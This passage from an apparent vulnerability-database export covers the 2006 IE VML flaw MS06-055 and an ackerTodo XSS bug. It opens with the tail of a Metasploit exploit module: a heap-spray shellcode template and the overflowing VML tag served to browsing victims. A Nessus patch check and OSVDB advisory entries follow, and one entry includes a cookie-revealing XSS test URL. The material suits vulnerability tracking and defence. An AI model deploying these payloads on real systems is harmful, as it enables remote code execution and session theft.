\nvar #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ; \nwhile (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; \n \nvar #{var_x} = new Array() ; \nfor ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { \n#{var_x}[ #{var_i} ] = \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; \n} \n \n</script> \n<#{xmlns}:#{vmlelem}> \n<#{xmlns}:fill method = \"#{buffer}\" /> \n</#{xmlns}:#{vmlelem}> \n \n</body> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83194/ms06_055_vml_method.rb.txt"}], "nessus": [{"lastseen": "2019-11-03T12:15:43", "bulletinFamily": "scanner", "description": "The remote host is running a version of Internet Explorer or Outlook Express\nthat is vulnerable to a bug in the Vector Markup Language (VML) handling routine\nthat could allow an attacker execute arbitrary code on the remote host by sending\na specially crafted email or by luring a user on the remote host into visiting\na rogue website.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS06-055.NASL", "href": "https://www.tenable.com/plugins/nessus/22449", "published": "2006-09-26T00:00:00", "title": "MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)", "type": "nessus", "sourceData": "#\n# Tenable Network Security, 
Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22449);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-4868\");\n script_bugtraq_id(20096);\n script_xref(name:\"CERT\", value:\"416092\");\n script_xref(name:\"MSFT\", value:\"MS06-055\");\n script_xref(name:\"MSKB\", value:\"925486\");\n\n script_name(english:\"MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)\");\n script_summary(english:\"Determines the presence of update 925486\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the email client or\nthe web browser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Internet Explorer or Outlook Express\nthat is vulnerable to a bug in the Vector Markup Language (VML) handling routine\nthat could allow an attacker execute arbitrary code on the remote host by sending\na specially crafted email or by luring a user on the remote host into visiting\na rogue website.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-055\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-055';\nkb = '925486';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\ndir = hotfix_get_commonfilesdir();\nif (!dir) exit(1, \"Failed to get the common files directory.\");\n\nshare = hotfix_path2share(path:dir);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Vgx.dll\", 
version:\"6.0.3790.593\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Vgx.dll\", version:\"6.0.3790.2794\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Vgx.dll\", version:\"6.0.2800.1580\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Vgx.dll\", version:\"6.0.2900.2997\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Vgx.dll\", version:\"6.0.2800.1580\", min_version:\"6.0.0.0\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Vgx.dll\", version:\"5.0.3845.1800\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nackerTodo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'task_id' variable upon submission to the index.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nackerTodo contains a flaw that allows a remote cross site scripting attack. 
This flaw exists because the application does not validate the 'task_id' variable upon submission to the index.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\n/index.php?cmd=edit_task&task_id=\"><script>document.write(document.cookie);</script>\n## References:\nVendor URL: http://ackertodo.sourceforge.net/site2/index.html\n[Secunia Advisory ID:21810](https://secuniaresearch.flexerasoftware.com/advisories/21810/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0106.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0440.html\nISS X-Force ID: 28810\nFrSIRT Advisory: ADV-2006-3517\n[CVE-2006-4668](https://vulners.com/cve/CVE-2006-4668)\nBugtraq ID: 19894\n", "modified": "2006-09-07T06:04:08", "published": "2006-09-07T06:04:08", "href": "https://vulners.com/osvdb/OSVDB:28611", "id": "OSVDB:28611", "type": "osvdb", "title": "ackerTodo index.php task_id Variable XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote stack-based buffer overflow exists in Microsoft Internet Explorer. The browser's vml rendering engine fails to check the length of a fill parameter on the rect tag resulting in a stack-based buffer overflow. With a specially crafted request that contains a vml graphics, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nSome recommendations included to disable active scripting or changing the access control list of the vgx.dll. Those recommendations do NOT successfully mitigate the risk.\n## Solution Description\nMicrosoft has released a patch to address this issue. 
Additionally, it is possible to correct the flaw by implementing the following workaround(s):\n\nTo un-register Vgx.dll, follow these steps:\n\nClick Start, click Run, type \"regsvr32 -u \"%ProgramFiles%\\Common Files\\Microsoft Shared\\VGX\\vgx.dll \" (without the quotation marks), and then click OK. \n## Short Description\nA remote stack-based buffer overflow exists in Microsoft Internet Explorer. The browser's vml rendering engine fails to check the length of a fill parameter on the rect tag resulting in a stack-based buffer overflow. With a specially crafted request that contains a vml graphics, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor Specific News/Changelog Entry: http://www.microsoft.com/technet/security/advisory/925568.mspx\n[Secunia Advisory ID:21989](https://secuniaresearch.flexerasoftware.com/advisories/21989/)\nOther Advisory URL: http://vil.nai.com/vil/Content/v_140629.htm\nOther Advisory URL: http://vil.nai.com/vil/Content/v_vul26881.htm\nOther Advisory URL: http://sunbeltblog.blogspot.com/2006/09/vulnerable-versions-of-outlook.html\nNews Article: http://news.com.com/Microsoft+mulls+early+IE+patch+release/2100-1002_3-6119393.html\nNews Article: http://www.theinquirer.net/default.aspx?article=37781\nNews Article: http://blog.washingtonpost.com/securityfix/2006/09/unofficial_patch_released_for_1.html\nNews Article: http://www.eweek.com/article2/0,1895,2017626,00.asp\nMicrosoft Security Bulletin: MS06-055\nMicrosoft Knowledge Base Article: 925486\nMicrosoft Knowledge Base Article: 925568\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0327.html\nISS X-Force ID: 29004\nGeneric Informational URL: http://blogs.securiteam.com/?p=640\nGeneric Informational URL: http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html\nGeneric Informational URL: http://www.w3.org/TR/NOTE-VML.html\nGeneric Informational URL: 
http://www.avertlabs.com/research/blog/?p=90\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/vml.c\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2425\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/20096.html\nFrSIRT Advisory: ADV-2006-3679\n[CVE-2006-3866](https://vulners.com/cve/CVE-2006-3866)\n[CVE-2006-4868](https://vulners.com/cve/CVE-2006-4868)\nCERT VU: 416092\nBugtraq ID: 20096\n", "modified": "2006-09-19T07:03:57", "published": "2006-09-19T07:03:57", "href": "https://vulners.com/osvdb/OSVDB:28946", "id": "OSVDB:28946", "type": "osvdb", "title": "Microsoft IE Vector Markup Language (VML) Arbitrary Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}